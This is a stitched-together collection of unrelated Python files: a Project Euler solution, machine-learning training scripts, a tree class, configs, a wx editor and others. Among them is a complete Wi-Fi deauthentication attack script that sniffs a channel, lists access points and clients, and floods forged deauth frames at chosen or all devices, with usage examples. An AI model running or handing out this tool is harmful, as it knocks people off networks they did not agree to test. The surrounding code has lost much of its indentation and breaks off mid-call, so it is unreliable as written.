#TODO it might be more efficient to sort only two at a time and compare them before moving on to the next pair, but I don't care enough about a few milliseconds to make this change.
two = sorted(two)
three = sorted(three)
four = sorted(four)
five = sorted(five)
six = sorted(six)
#compare value at each index
for i in range(len(two)):
if two[i] != three[i] or three[i] != four[i] or \
four[i] != five[i] or five[i] != six[i]:
return False
return True
def solveEuler052(dummy):
x=1
while True:
#See if 2*x and 6*x have the same number of digits, otherwise we can safely move on
two=2*x
six=str(3*two)
two=str(two)
if len(two) == len(six):
three=str(3*x)
four=str(4*x) #TODO More efficient to store two as a number and multiply it by 2 here? For example: four=str(2*two)
five=str(5*x)
if allSameDigits(two, three, four, five, six):
                print(two, three, four, five, six)
                print(x)
return x
x += 1
timeFunction(solveEuler052, None)
|
#!/usr/bin/env python
# Copyright (c) 2009-2013 Simon van Heeringen <s.vanheeringen@ncmls.ru.nl>
#
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
import sys
import os
from gimmemotifs.genome_index import GenomeIndex
def index(args):
if not os.path.exists(args.indexdir):
print "Index_dir %s does not exist!" % (args.indexdir)
sys.exit(1)
fasta_dir = args.fastadir
index_dir = os.path.join(args.indexdir, args.indexname)
g = GenomeIndex()
g = g.create_index(fasta_dir, index_dir)
|
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
from sklearn.model_selection import train_test_split
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from model_unet import unet
from data_tools import scaled_in, scaled_ou
def training(path_save_spectrogram, weights_path, name_model, training_from_scratch, epochs, batch_size):
""" This function will read noisy voice and clean voice spectrograms created by data_creation mode,
and train a Unet model on this dataset for epochs and batch_size specified. It saves best models to disk regularly
If training_from_scratch is set to True it will train from scratch, if set to False, it will train
from weights (name_model) provided in weights_path
"""
#load noisy voice & clean voice spectrograms created by data_creation mode
X_in = np.load(path_save_spectrogram +'noisy_voice_amp_db'+".npy")
X_ou = np.load(path_save_spectrogram +'voice_amp_db'+".npy")
#Model of noise to predict
X_ou = X_in - X_ou
#Check distribution
print(stats.describe(X_in.reshape(-1,1)))
print(stats.describe(X_ou.reshape(-1,1)))
#to scale between -1 and 1
X_in = scaled_in(X_in)
X_ou = scaled_ou(X_ou)
#Check shape of spectrograms
print(X_in.shape)
print(X_ou.shape)
#Check new distribution
print(stats.describe(X_in.reshape(-1,1)))
print(stats.describe(X_ou.reshape(-1,1)))
#Reshape for training
X_in = X_in[:,:,:]
X_in = X_in.reshape(X_in.shape[0],X_in.shape[1],X_in.shape[2],1)
X_ou = X_ou[:,:,:]
X_ou = X_ou.reshape(X_ou.shape[0],X_ou.shape[1],X_ou.shape[2],1)
X_train, X_test, y_train, y_test = train_test_split(X_in, X_ou, test_size=0.10, random_state=42)
#If training from scratch
if training_from_scratch:
generator_nn=unet()
#If training from pre-trained weights
else:
generator_nn=unet(pretrained_weights = weights_path+name_model+'.h5')
#Save best models to disk during training
checkpoint = ModelCheckpoint(weights_path+'/model_best.h5', verbose=1, monitor='val_loss',save_best_only=True, mode='auto')
generator_nn.summary()
#Training
history = generator_nn.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, shuffle=True, callbacks=[checkpoint], verbose=1, validation_data=(X_test, y_test))
#Plot training and validation loss (log scale)
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, label='Training loss')
plt.plot(epochs, val_loss, label='Validation loss')
plt.yscale('log')
plt.title('Training and validation loss')
plt.legend()
plt.show()
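# Hypothetical invocation sketch: the paths and hyper-parameters below are
# placeholders, not values shipped with this project. Uncomment and adapt to the
# data layout produced by the data_creation mode.
# training(path_save_spectrogram='./spectrograms/',
#          weights_path='./weights/',
#          name_model='model_unet',
#          training_from_scratch=True,
#          epochs=10,
#          batch_size=20)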
|
#!/usr/bin/python3
#
# Wi-Fi DeAuth attack
# by GramThanos
#
# Dependencies
# pip3 install scapy
# pip3 install mac-vendor-lookup
# Libraries
import os
import re
import sys
import getopt
import subprocess
import logging
from scapy.all import *
from mac_vendor_lookup import MacLookup
# Global Variables
VERBOSE = False
MACLOOKUP = None
INTERFACE_MONITOR = None
CHANNEL = None
SNIFF_MODE = 'SCAN'
ATTACK_ALL = False
access_points = []
victim_clients = []
# Instruct Scapy to use PCAP
#conf.use_pcap = True
''' Initialize Script
-----------------------------------'''
def initialize():
global MACLOOKUP
# Parse arguments
parse_script_arguments()
# Set up logging
logging.basicConfig(
level= logging.DEBUG if VERBOSE else logging.INFO,
format='[ATK]' + '[%(levelname)s] %(message)s'
)
# Check if root
if os.getuid() != 0:
		logging.error('Run the script as root')
		sys.exit(1)
# Init MAC lookup
MACLOOKUP = MacLookup()
MACLOOKUP.load_vendors()
# Parse parameters
def parse_script_arguments():
global VERBOSE, CHANNEL, SNIFF_MODE, ATTACK_ALL
try:
opts, args = getopt.getopt(sys.argv[1:], 'vhc:a:', ['verbose', 'help', 'channel=', 'attack='])
except getopt.GetoptError as err:
print(err)
show_script_usage()
sys.exit(2)
for o, a in opts:
# Print more info
if o == '-v' or o == '--verbose':
VERBOSE = True
# Print help message
elif o in ('-h', '--help'):
show_script_usage()
sys.exit()
# Set channel to scan/attack
elif o in ('-c', '--channel'):
CHANNEL = int(a)
			if not (1 <= CHANNEL <= 14):
CHANNEL = None
# MAC to attack
elif o in ('-a', '--attack'):
if a.lower() == '*':
ATTACK_ALL = True
elif validate_mac_address(a):
victim_clients.append(a)
SNIFF_MODE = 'ATTACK'
else:
assert False, "Invald MAC address to attack"
else:
assert False, "Unhandled option"
# Show help message
def show_script_usage():
print(
'Usage: sudo ./deauth.py [ARGUMENTS]...\n'
'\n'
'Optional arguments.\n'
' -v Run in verbose mode.\n'
' -h, --help Prints this message.\n'
' -c, --channel Channel to monitor.\n'
' -a, --attack Victim\'s MAC address.\n'
'\n'
'Example usage\n'
' Monitor channel 8 for victims:\n'
' sudo ./deauth.py -c 8\n'
' Attack all clients on channel 8:\n'
' sudo ./deauth.py -c 8 -a *\n'
' Attack clients by MAC on channel 8:\n'
' sudo ./deauth.py -c 8 -a AA:11:22:33:44:55 -a BB:11:22:33:44:55\n'
'\n'
'By GramThanos'
)
''' Help Functions
-----------------------------------'''
def throw_error(error):
if error:
logging.critical(error)
logging.critical('Failed!')
sys.exit(1)
def run_command(command):
if isinstance(command, str):
return subprocess.run(command, shell=True, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
return subprocess.run(command, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_command_assert(command, error):
logging.debug(command)
result = run_command(command)
if result.returncode != 0:
throw_error(error)
return result
def query_yes_no(question, default="yes"):
"""
https://stackoverflow.com/a/3041990/3709257
Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def query_number(question, num_from, num_to, default=-1):
	if default < num_from or default > num_to:
raise ValueError("invalid default answer: '%s'" % str(default))
prompt = " [" + str(num_from) + "-" + str(num_to) + ":" + str(default) + "] "
while True:
sys.stdout.write(question + prompt)
choice = input()
if default is not None and choice == '':
return default
choice = int(choice)
		if num_from <= choice <= num_to:
return choice
else:
sys.stdout.write("Please respond with a number from " + str(num_from) + "-" + str(num_to) + ".\n")
# Display MAC and Vendor
def mac_and_ventor(mac):
if mac is None:
return 'None [ - ]'
try:
vendor = MACLOOKUP.lookup(mac)
except KeyError as e:
vendor = 'Unknown'
return mac + ' [' + vendor + ']'
# Validate MAC address
def validate_mac_address(value):
if re.match(r"^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$", value):
return True
return False
''' Interfaces Functions
-----------------------------------'''
# Get monitor interfaces
def get_monitor_interfaces():
# Get all wireless interfaces
result = run_command_assert('iwconfig', 'Failed to get wireless interfaces!')
# Parse interfaces
result = re.sub(r"\n\s+\n", "\n\n", result.stdout.decode('utf-8'))
data = re.findall(r"(([a-zA-Z0-9]+)\s+(?:.+\n)+)", result)
# For each result
interfaces = []
for interface in data:
if re.search(r"\s+Mode:Monitor\s+", interface[0]) :
interfaces.append(interface[1])
# Return interfaces
return interfaces
# Select monitor interface
def select_monitor_interface():
# Get all monitor interfaces
interfaces = get_monitor_interfaces()
	# No monitor interface found
	if len(interfaces) == 0:
		throw_error('No interface found in monitor mode!')
	# More than one
	if len(interfaces) > 1:
logging.info('Selecting the first interface in monitor mode')
logging.info('Interface "%s" selected' % interfaces[0])
return interfaces[0]
# Set monitor channel
def set_monitor_channel(interface, channel):
# Change channel
result = run_command('iwconfig %s channel %d' % (interface, channel))
if result.returncode != 0:
logging.error('Failed to set channel %d on interface "%s"' % (channel, interface))
# Ask to try again
if query_yes_no('Do you want to reset the interface "%s"?' % interface, 'yes'):
# Reset interface
run_command_assert(
'ifconfig %s down && ifconfig %s up' % (interface, interface),
'Failed to reset interface "%s"' % interface
)
# Try again
run_command_assert(
'iwconfig %s channel %d' % (interface, channel),
'Failed to set channel %d on interface "%s"' % (channel, interface)
)
else:
throw_error('Cancel')
logging.info('Channel was set to %d' % channel)
''' Packet Functions
-----------------------------------'''
# Scan mode - List Devices using the channel
def sniffer_handler_scan(packet):
# Get layer info
layer = packet.getlayer(Dot11)
# Record any beacon access point
if packet.haslayer(Dot11Beacon) and layer.addr2 not in access_points:
access_points.append(layer.addr2)
logging.info('Detected AP : "%s" - %s' % (packet.getlayer(Dot11Elt).info.decode('UTF-8'), mac_and_ventor(layer.addr2)))
# Filter packages from the victim to the access point
elif layer.addr2 is not None and layer.addr2 not in victim_clients and layer.addr1 in access_points:
victim_clients.append(layer.addr2)
logging.info('Detected victim : %s' % (mac_and_ventor(layer.addr2)))
# Attack mode - Send DeAuth packets to victim devices
ATTACK_COUNTER = 0
def sniffer_handler_attack(packet):
global ATTACK_COUNTER
# Get layer info
layer = packet.getlayer(Dot11)
# Record any beacon access point
if packet.haslayer(Dot11Beacon) and layer.addr2 not in access_points:
access_points.append(layer.addr2)
logging.info('Detected AP : "%s" - %s' % (packet.getlayer(Dot11Elt).info.decode('UTF-8'), mac_and_ventor(layer.addr2)))
# Filter packages from the victim to the access point
elif ((ATTACK_ALL == True and layer.addr2 is not None) or layer.addr2 in victim_clients) and layer.addr1 in access_points:
ATTACK_COUNTER = ATTACK_COUNTER + 1
logging.info('Deauth : [%d] %s' % (ATTACK_COUNTER, mac_and_ventor(layer.addr2)))
inject = RadioTap()/Dot11(addr1=layer.addr2,addr2=layer.addr1,addr3=layer.addr1)/Dot11Deauth(reason=7)
sendp(inject, iface=INTERFACE_MONITOR, count=10, verbose=False)
''' Execution
-----------------------------------'''
if __name__ == "__main__":
# Initialize script
initialize()
# Get an interface
INTERFACE_MONITOR = select_monitor_interface()
# Set channel
if CHANNEL is None:
CHANNEL = query_number('Select channel to monitor', 1, 14, default=1)
set_monitor_channel(INTERFACE_MONITOR, CHANNEL)
# Start monitoring
handler = \
sniffer_handler_attack if SNIFF_MODE == 'ATTACK' else\
sniffer_handler_scan
sniff(iface=INTERFACE_MONITOR, prn=handler)
|
from .potongan_absen_karyawan import MxPotonganAbsenKaryawan
from .rekap_absen_karyawan import MxRekapAbsenKaryawan
from .rekap_gaji_departemen import MxRekapGajiDepartemen
from .rekap_lembur_karyawan import MxRekapLemburKaryawan
from .slip_gaji_karyawan import MxSlipGajiKaryawan
from .upah_lembur_karyawan import MxUpahLemburKaryawan
|
def teardown_function(function):
raise Exception('teardown failed')
def test():
pass
|
"""Module Implements General Trees using linked lists
Author: Rajan Subramanian
Date: -
"""
from __future__ import annotations
from typing import Any, Iterator, List, Union
from marketlearn.algorithms.trees import tree_base as tb
class GeneralTree(tb._GeneralTreeBase):
"""Class representing general tree structure using linked representation"""
class _Node:
__slots__ = "_element", "_parent", "_children", "_total_children"
        def __init__(self, element: Any, parent=None, children=None):
            self._element = element
            self._parent = parent
            # avoid sharing a mutable default list between nodes
            self._children = list(children) if children else []
            self._total_children = len(self._children)
def __len__(self):
"""returns total numbner of children in the node
Returns
-------
int
count of number of children in this node
"""
return self._total_children
def __repr__(self):
return "Node({!r})".format(self._element)
class Position(tb.Position):
"""Abstraction representing location of single element"""
def __init__(self, container, node):
self._container = container
self._node = node
def element(self):
"""return element stored at position"""
return self._node._element
def __eq__(self, other: object):
            if not isinstance(other, tb.Position):
return NotImplemented
return type(other) is type(self) and other._node is self._node
def _make_position(self, node: _Node) -> Union[Position, None]:
"""Return Position's instance for a given node"""
return self.Position(self, node) if node is not None else None
def _validate(self, p: Position) -> _Node:
"""return position's node or raise appropriate error if invalid
Parameters
----------
p : Position
represents the position of interest
Returns
-------
_Node
position's node object
Raises
------
TypeError
if p is not a proper Position
TypeError
if p does not belong to same container
ValueError
if p's parent is the current node
"""
if not isinstance(p, self.Position):
raise TypeError("p must be proper Position type")
if p._container is not self:
raise TypeError("p does not belong to this container")
# convention for deprecated nodes
if p._node._parent is p._node:
raise ValueError("p is no longer valid")
return p._node
# general tree constructor
def __init__(self):
"""Creates a initially empty general tree"""
self._root = None
self._size = 0
def __len__(self):
"""returns total number of nodes in a tree"""
return self._size
def root(self) -> Position:
"""return root position of tree, return None if tree is empty"""
return self._make_position(self._root)
def parent(self, p: Position) -> Union[Position, None]:
"""return position representing p's parent (or None if p is root)
Parameters
----------
p : Position
position who's parent we are interested in
Returns
-------
Union[Position, None]
position representing p's parent or None if p is root
"""
node = self._validate(p)
return self._make_position(node._parent)
def num_children(self, p: Position) -> int:
"""returns count of total children of position p
Parameters
----------
p : Position
represents the parent position
Returns
-------
int
count of total children of p
"""
node = self._validate(p)
return len(node)
def children(self, p: Position) -> Iterator[Position]:
"""generates iteration of p's children
Parameters
----------
p : Position
[description]
Yields
-------
Iterator[Position]
[description]
"""
node = self._validate(p)
for child in node._children:
yield self._make_position(child)
def _add_root(self, data: Any) -> Position:
"""Adds root position to a tree
Parameters
----------
data : Any
[description]
Returns
-------
Position
[description]
Raises
------
ValueError
[description]
"""
if self._root:
raise ValueError("Root Exists")
self._size = 1
self._root = self._Node(data)
return self._make_position(self._root)
def _add_children(
self, p: Position, children: List[Any]
) -> List[Position]:
"""Add children data into p's position
Parameters
----------
p : Position
[description]
children : List[Any]
[description]
Returns
-------
List[Position]
list of positions representing p's children
Raises
------
ValueError
if children data already exists
"""
node = self._validate(p)
        if node._children:
            raise ValueError("children already exist")
        node_children = [None] * len(children)
        for idx, child in enumerate(children):
            child_node = self._Node(child, parent=node)
            node_children[idx] = child_node
            self._size += 1
        # assign children to this node and keep its child count in sync
        node._children = node_children
        node._total_children = len(node_children)
return [self._make_position(n) for n in node._children]
def positions(self, traversal: str = "preorder") -> Iterator[Position]:
"""Generates iterations of tree's positions
Parameters
----------
        traversal : str, optional, default='preorder'
one of preorder, postorder, breadthfirst
Yields
-------
Iterator[Position]
[description]
"""
return getattr(self, traversal)()
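if __name__ == "__main__":
    # Minimal usage sketch: build a two-level tree and query it. Only methods
    # defined in this module are exercised; traversals via ``positions`` are
    # omitted because the concrete generators live in tb._GeneralTreeBase.
    tree = GeneralTree()
    root = tree._add_root("root")
    tree._add_children(root, ["left", "middle", "right"])
    print(len(tree))                                    # 4 nodes in total
    print(tree.num_children(root))                      # 3
    print([c.element() for c in tree.children(root)])   # ['left', 'middle', 'right']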
|
import os
import sys
import random
import numpy as np
import pandas as pd
# Please modify to fit your environment
import tensorflow as tf
import tensorflow.contrib.keras.api.keras as keras
from tensorflow.contrib.keras.api.keras import backend, callbacks
from tensorflow.contrib.keras.api.keras.models import Model
from tensorflow.contrib.keras.api.keras.layers import Input
from tensorflow.contrib.keras.api.keras.utils import Progbar
from tensorflow.contrib.keras.api.keras.optimizers import Adam
from functools import partial
from sklearn.neighbors import NearestNeighbors
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import macro as mc
import load_data as ld
import preprocess as pre
import models
import compute_relation_vectors as rv
if len(sys.argv) != 2:
print("input error: main.py method_flag")
print("method flag : nontransfer (=0), standard transfer learning (=1), count ver. all transfer deep learning (=2),\
mean ver. all transfer deep learning (=3), mean modified ver. all transfer deep learning (=4)")
sys.exit(1)
_, method_flag = sys.argv
def Neighbors( labels, database, knum ):
nbrs = NearestNeighbors(n_neighbors=knum, algorithm='ball_tree').fit(database)
dis, idx = nbrs.kneighbors(labels)
return dis, idx
def main(method_flag):
# load data
source_df, target_df = ld.load_file()
predicts, corrects = [], []
random.seed(123)
np.random.seed(123)
    kf = KFold(shuffle=False, n_splits=mc._FOLD_NUM)  # random_state has no effect when shuffle=False
fold_num = 1
cnt = 0
for train, test in kf.split(target_df):
print('{0}/{1}'.format(fold_num, mc._FOLD_NUM))
target_train = target_df.iloc[train]
target_test = target_df.iloc[test]
idx, labels = transfer_model(source_df, target_train, target_test, method_flag, fold_num)
predicts.extend(idx.tolist())
corrects.extend(labels[0].tolist())
fold_num = fold_num+1
# save results
predicts = np.array(predicts)
corrects = np.array(corrects)
err = []
for i in range(len(predicts)):
if predicts[i] == corrects[i]:
err.append(0)
else:
err.append(1)
test = np.concatenate((np.reshape(predicts,[len(predicts),1]),np.reshape(corrects,[len(corrects),1]),\
np.reshape(err,[len(err),1])), axis=1)
save_data = pd.DataFrame(test)
save_data.to_csv('%s'%(mc._RESULT_FILE),index=False,header=False)
#save_data.to_csv('../results/results.csv',index=False,header=False)
fp = open('%s'%(mc._RESULT_FILE),'a')
#fp = open('../results/results.csv','a')
fp.write('%f\n'%((1.0-np.mean(err))*100.0))
fp.close()
def transfer_model(source_df, target_df, test_df, method_flag, fold_num):
source_labels, source_data = np.split(np.array(source_df),[1],axis=1)
target_labels, target_data = np.split(np.array(target_df),[1],axis=1)
test_labels, test_data = np.split(np.array(test_df),[1],axis=1)
# normalization
#normalized_source_data = pre.normalize(source_data)
#normalized_target_data = pre.normalize(target_data)
#normalized_test_data = pre.normalize(test_data)
normalized_source_data = source_data
normalized_target_data = target_data
normalized_test_data = test_data
    ### construct model for source domain task ###
# optimization
opt = Adam()
# network setting
latent = models.latent(normalized_source_data.shape[1])
sll = models.source_last_layer()
tll = models.target_last_layer()
source_inputs = Input(shape=normalized_source_data.shape[1:])
latent_features = latent(source_inputs)
source_predictors = sll(latent_features)
latent.trainable = mc._SORUCE_LATENT_TRAIN
source_predictors.trainable = True
source_nn = Model(inputs=[source_inputs], outputs=[source_predictors])
source_nn.compile(loss=['mean_squared_error'],optimizer=opt)
#source_nn.summary()
# training using source domain data
if method_flag != mc._SCRATCH:
source_max_loop = int(normalized_source_data.shape[0]/mc._BATCH_SIZE)
source_progbar = Progbar(target=mc._SOURCE_EPOCH_NUM)
for epoch in range(mc._SOURCE_EPOCH_NUM):
shuffle_data, shuffle_labels, _ = pre.paired_shuffle(normalized_source_data,source_labels,1)
for loop in range(source_max_loop):
batch_train_data = shuffle_data[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = shuffle_labels[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = np.reshape(batch_train_labels, [len(batch_train_labels)])
one_hots = np.identity(mc._SOURCE_DIM_NUM)[np.array(batch_train_labels, dtype=np.int32)]
loss = source_nn.train_on_batch([batch_train_data],[one_hots])
#source_progbar.add(1, values=[("source loss",loss)])
# save
#latent.save('../results/source_latent.h5')
#sll.save('../results/source_last_layer.h5')
# compute relation vectors
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
target_vectors = np.identity(mc._TARGET_DIM_NUM)[np.array(target_labels, dtype=np.int32)]
target_vectors = np.reshape(target_vectors, [target_vectors.shape[0], target_vectors.shape[2]])
elif method_flag == mc._COUNT_ATDL:
target_labels, relations = rv.compute_relation_labels(source_nn, normalized_target_data, target_labels, fold_num)
target_vectors = np.identity(mc._SOURCE_DIM_NUM)[np.array(target_labels, dtype=np.int32)]
target_vectors = np.reshape(target_vectors, [target_vectors.shape[0], target_vectors.shape[2]])
else:
relation_vectors = rv.compute_relation_vectors(source_nn, normalized_target_data, target_labels, fold_num, method_flag)
target_vectors = np.zeros((len(target_labels),mc._SOURCE_DIM_NUM), dtype=np.float32)
for i in range(len(target_labels)):
target_vectors[i] = relation_vectors[int(target_labels[i])]
### tuning model for target domain task ###
latent.trainable = mc._TARGET_LATENT_TRAIN
target_inputs = Input(shape=normalized_target_data.shape[1:])
latent_features = latent(target_inputs)
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
predictors = tll(latent_features)
label_num = mc._TARGET_DIM_NUM
else:
predictors= sll(latent_features)
label_num = mc._SOURCE_DIM_NUM
target_nn = Model(inputs=[target_inputs], outputs=[predictors])
target_nn.compile(loss=['mean_squared_error'],optimizer=opt)
#target_nn.summary()
# training using target domain data
target_max_loop = int(normalized_target_data.shape[0]/mc._BATCH_SIZE)
target_progbar = Progbar(target=mc._TARGET_EPOCH_NUM)
for epoch in range(mc._TARGET_EPOCH_NUM):
shuffle_data, shuffle_labels, _ = \
pre.paired_shuffle(normalized_target_data, target_vectors, label_num)
for loop in range(target_max_loop):
batch_train_data = shuffle_data[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = shuffle_labels[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
loss = target_nn.train_on_batch([batch_train_data],[batch_train_labels])
#target_progbar.add(1, values=[("target loss",loss)])
# compute outputs of test data of target domain
x = target_nn.predict([normalized_test_data])
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
idx = np.argmax(x, axis=1)
elif method_flag == mc._COUNT_ATDL:
idx = np.argmax(x,axis=1)
for j in range(len(test_labels)):
for i in range(mc._TARGET_DIM_NUM):
if test_labels[j] == i:
test_labels[j] = relations[i]
break
else:
distance, idx = Neighbors(x, relation_vectors, 1)
idx = idx[:,0]
backend.clear_session()
return idx.T, test_labels.T
if __name__ == '__main__':
method_flag = int(method_flag)
main(method_flag)
|
'''
@Author: Gordon Lee
@Date: 2019-08-12 21:53:17
@LastEditors: Gordon Lee
@LastEditTime: 2019-08-13 17:58:30
@Description:
'''
class Config(object):
'''
    Global configuration parameters
    '''
    status = 'train'  # run train_eval or test; defaults to train_eval
    use_model = 'TextCNN'  # which model to use; defaults to TextCNN
    output_folder = 'output_data/'  # folder containing the processed data
    data_name = 'SST-1'  # SST-1 (fine-grained) or SST-2 (binary)
    SST_path = 'data/stanfordSentimentTreebank/'  # path to the dataset
    emb_file = 'data/glove.6B.300d.txt'  # path to the pre-trained word vectors
    emb_format = 'glove'  # embedding format: word2vec/glove
    min_word_freq = 1  # minimum word frequency
    max_len = 40  # maximum sampled sequence length
|
import json
from dataclasses import dataclass
from typing import List, NamedTuple
import pytorch_lightning as pl
import torch
from sentencepiece import SentencePieceProcessor
from torch.nn.functional import pad
from torch.utils.data import DataLoader
from src.config import ConveRTTrainConfig
config = ConveRTTrainConfig()
# Todo implement BPE from scratch with unk tokens hashed (although may achieve worse results on downstream tasks) as
# perhaps not as general as bpemb's 25000.model
@dataclass
class EncoderInputFeature:
input_ids: torch.Tensor
attention_mask: torch.Tensor
position_ids: torch.Tensor
input_lengths: torch.Tensor
def pad_sequence(self, seq_len: int):
self.input_ids = pad(
self.input_ids, [0, seq_len - self.input_ids.size(0)], "constant", 0
)
self.attention_mask = pad(
self.attention_mask,
[0, seq_len - self.attention_mask.size(0)],
"constant",
0,
)
self.position_ids = pad(
self.position_ids, [0, seq_len - self.position_ids.size(0)], "constant", 0
)
@dataclass
class EmbeddingPair:
context: EncoderInputFeature
reply: EncoderInputFeature
class DataModule(pl.LightningDataModule):
    # Using PyTorch Lightning, as it will save a lot of time downstream when using multi-GPU,
    # distributed training, and for managing 16-bit precision.
def __init__(self):
super().__init__()
self.input_attributes = [
"input_ids",
"attention_mask",
"position_ids",
"input_lengths",
]
def batching_input_features(
self, encoder_inputs: List[EncoderInputFeature]
) -> EncoderInputFeature:
max_seq_len = max(
[
int(encoder_input.input_lengths.item())
for encoder_input in encoder_inputs
]
)
for encoder_input in encoder_inputs:
encoder_input.pad_sequence(max_seq_len)
batch_features = {
feature_name: torch.stack(
[
getattr(encoder_input, feature_name)
for encoder_input in encoder_inputs
],
dim = 0,
)
for feature_name in self.input_attributes
}
return EncoderInputFeature(**batch_features)
def convert_collate_fn(self, features: List[EmbeddingPair]) -> EmbeddingPair:
return EmbeddingPair(
context = self.batching_input_features(
[feature.context for feature in features]
),
reply = self.batching_input_features([feature.reply for feature in features]),
)
def train_dataloader(self, train_dataset):
return DataLoader(
train_dataset,
config.train_batch_size,
collate_fn = self.convert_collate_fn,
drop_last = True, # drop last incomplete batch
#num_workers = 8
)
def val_dataloader(self):
# Todo
pass
# return DataLoader()
def test_dataloader(self):
# Todo
pass
# return DataLoader()
class DatasetInstance(NamedTuple):
context: List[str]
response: str
def load_instances_from_reddit_json(dataset_path: str) -> List[DatasetInstance]:
instances: List[DatasetInstance] = []
with open(dataset_path) as f:
for line in f:
x = json.loads(line)
context_keys = sorted([key for key in x.keys() if "context" in key])
instance = DatasetInstance(
context = [x[key] for key in context_keys], response = x["response"],
)
instances.append(instance)
return instances
class RedditData(torch.utils.data.Dataset):
def __init__(
self,
instances: List[DatasetInstance],
sp_processor: SentencePieceProcessor,
truncation_length: int,
):
self.sp_processor = sp_processor
self.instances = instances
self.truncation_length = truncation_length
def __len__(self):
return len(self.instances)
def __getitem__(self, item):
context_str = self.instances[item].context[0]
context_embedding = self._convert_instance_to_embedding(context_str)
reply_embedding = self._convert_instance_to_embedding(
self.instances[item].response
)
return EmbeddingPair(context = context_embedding, reply = reply_embedding)
def _convert_instance_to_embedding(self, input_str: str) -> EncoderInputFeature:
input_ids = self.sp_processor.EncodeAsIds(input_str)
if self.truncation_length:
input_ids = input_ids[: self.truncation_length]
attention_mask = [1 for _ in range(len(input_ids))] # [1]*len(input_ids)
        position_ids = [i for i in range(len(input_ids))]  # list(range(len(input_ids)))
return EncoderInputFeature(
input_ids = torch.tensor(input_ids).to(config.device),
attention_mask = torch.tensor(attention_mask).to(config.device),
position_ids = torch.tensor(position_ids).to(config.device),
input_lengths = torch.tensor(len(input_ids)).to(config.device),
)
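# Hypothetical wiring sketch: the sentencepiece model and dataset paths below are
# placeholders (any BPE model loadable by SentencePieceProcessor and a
# reddit-style json-lines file with "context*"/"response" keys would do).
# sp = SentencePieceProcessor()
# sp.Load("bpe.model")                                       # placeholder model path
# instances = load_instances_from_reddit_json("train.json")  # placeholder data path
# dataset = RedditData(instances, sp, truncation_length=60)
# loader = DataModule().train_dataloader(dataset)
# batch = next(iter(loader))  # EmbeddingPair with batched context/reply tensors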
|
# Challenge: Write a Python program that opens and plays an mp3 file.
#import pygame
#pygame.mixer.init()
#pygame.mixer.music.load('Ex021.mp3')
#pygame.mixer.music.play()
#while(pygame.mixer.music.get_busy()): pass
import playsound
playsound.playsound('Ex021.mp3')
|
from __future__ import print_function
import lemon
class MyWorkflow(lemon.Workflow):
def __init__(self):
import lemon
lemon.Workflow.__init__(self)
self.rnc = {}
def worker(self, entry, pdbid):
import lemon
self.rnc = lemon.count_residues(entry, self.rnc)
return ""
def finalize(self):
for rn in self.rnc:
print(str(rn) + '\t' + str(self.rnc[rn]))
wf = MyWorkflow()
lemon.launch(wf, LEMON_HADOOP_DIR, LEMON_NUM_THREADS)
|
import json
import os
from collections import OrderedDict
import wx
from core.src.frame_classes.design_frame import MyDialogKetValueSetting
class NamesEditFrame(MyDialogKetValueSetting):
def __init__(self, parent, names, path):
super(NamesEditFrame, self).__init__(parent)
self.names = names
self.edit_group = OrderedDict(self.names)
self.key_group = list(self.edit_group.keys())
self.show_list = []
self.path = path
self.is_changed = False
@staticmethod
def string_format(key, value):
return f'"{key}"->"{value}"'
def get_names(self):
return self.names
def clear_data(self):
self.m_textCtrl_new_value.Clear()
self.m_textCtrl_new_key.Clear()
def editor_init(self, event):
for key, item in self.edit_group.items():
self.show_list.append(f'"{key}"->"{item}"')
self.m_listBox_name_exist.Clear()
self.m_listBox_name_exist.Set(self.show_list)
def view_item(self, event):
index = event.GetSelection()
key = self.key_group[index]
value = self.edit_group.get(key)
wx.MessageBox(f"'{key}'->'{value}'", "信息")
def edit_exist_item(self, event):
index = event.GetSelection()
key = self.key_group[index]
value = self.edit_group.get(key)
self.m_textCtrl_new_key.SetValue(key)
self.m_textCtrl_new_value.SetValue(value)
def add_item(self, event):
key = self.m_textCtrl_new_key.GetValue()
value = self.m_textCtrl_new_value.GetValue()
if key == "" or value == "":
wx.MessageBox("键或值不能为空白!", "错误", wx.ICON_ERROR)
else:
if key in self.key_group:
index = self.key_group.index(key)
feedback = wx.MessageBox(f"【{key}】已经存在键组中,点击【确认】将会使用新值覆盖", "信息", wx.YES_NO | wx.ICON_INFORMATION)
if feedback == wx.YES:
self.edit_group[key] = value
self.m_listBox_name_exist.SetString(index, f'"{key}"->"{value}"')
self.is_changed = True
else:
self.key_group.append(key)
self.edit_group[key] = value
self.is_changed = True
self.m_listBox_name_exist.Append(f'"{key}"->"{value}"')
self.clear_data()
def clear_item(self, event):
self.clear_data()
def import_names(self, event):
overwrite = 0
new_item = 0
dialog = wx.FileDialog(self, "加载键值对文件(json)", os.path.join(self.path, "core\\assets"), "names.json", "*json",
